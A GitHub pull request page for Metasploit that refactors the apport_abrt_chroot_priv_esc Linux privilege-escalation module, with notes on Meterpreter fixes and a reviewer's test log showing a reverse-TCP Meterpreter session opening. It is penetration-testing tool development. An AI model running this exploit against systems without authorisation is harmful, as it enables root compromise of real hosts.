
Cleanup apport_abrt_chroot_priv_esc #11761

Merged
merged 1 commit into from Apr 29, 2019

@bcoles (Contributor) commented Apr 19, 2019

Updates the apport_abrt_chroot_priv_esc module to be more in-line with current Linux LPE modules through code style changes and using new libs.

Also fixes a few issues when using the module on Meterpreter sessions:

  • The module made use of cd, which won't work on Meterpreter sessions, causing hard linking to fail, causing the exploit to fail. Using cd also results in the exploit directory generated by the exploit to appear in the working directory, not the intended directory, resulting in the directory not being cleaned up after a failed exploitation attempt.
  • The module upgraded the session in a new process (sub-shell) prior to executing the payload. This implementation works for command shell sessions, but was unsafe for Meterpreter sessions, and would cause the exploit to fail.

Note, it should work on Ubuntu 14.04.1 out of the box, but if you're testing on Fedora 19/20/21, you'll likely need to reintroduce the vulnerability as per #9399 (comment) #9399 (comment) (although disabling SELinux should not be necessary) - unless you feel like attempting to cherry-pick the appropriate packages.

@bcoles (Contributor, Author) commented Apr 22, 2019

@msjenkins-r7 would you lie to me?

@wchen-r7 wchen-r7 self-assigned this Apr 26, 2019

@wchen-r7 (Contributor) commented Apr 29, 2019

Module works for me. I'll land this in a bit:

msf5 exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[*] Started reverse TCP handler on 172.16.249.1:4445 
[*] Writing '/tmp/.1KI5rW' (64812 bytes) ...
[*] Writing '/tmp/.LlwvX' (207 bytes) ...
[*] Launching exploit...
[*] Sending stage (985320 bytes) to 172.16.249.135
[*] Meterpreter session 3 opened (172.16.249.1:4445 -> 172.16.249.135:58425) at 2019-04-29 13:51:36 -0500

meterpreter > 

@wchen-r7 wchen-r7 merged commit da9aba0 into rapid7:master Apr 29, 2019

2 of 3 checks passed

continuous-integration/travis-ci/pr - The Travis CI build failed
Metasploit Automation - Sanity Test Execution - Successfully completed all tests.
Metasploit Automation - Test Execution - Successfully completed all tests.

wchen-r7 added a commit that referenced this pull request Apr 29, 2019

@wchen-r7 (Contributor) commented Apr 29, 2019

Release Notes

This updates the apport_abrt_chroot_priv_esc module to be more in-line with current Linux LPE modules through code style changes and using new libs.

msjenkins-r7 added a commit that referenced this pull request Apr 29, 2019

@bcoles bcoles deleted the bcoles:apport_abrt_chroot_priv_esc branch Apr 29, 2019
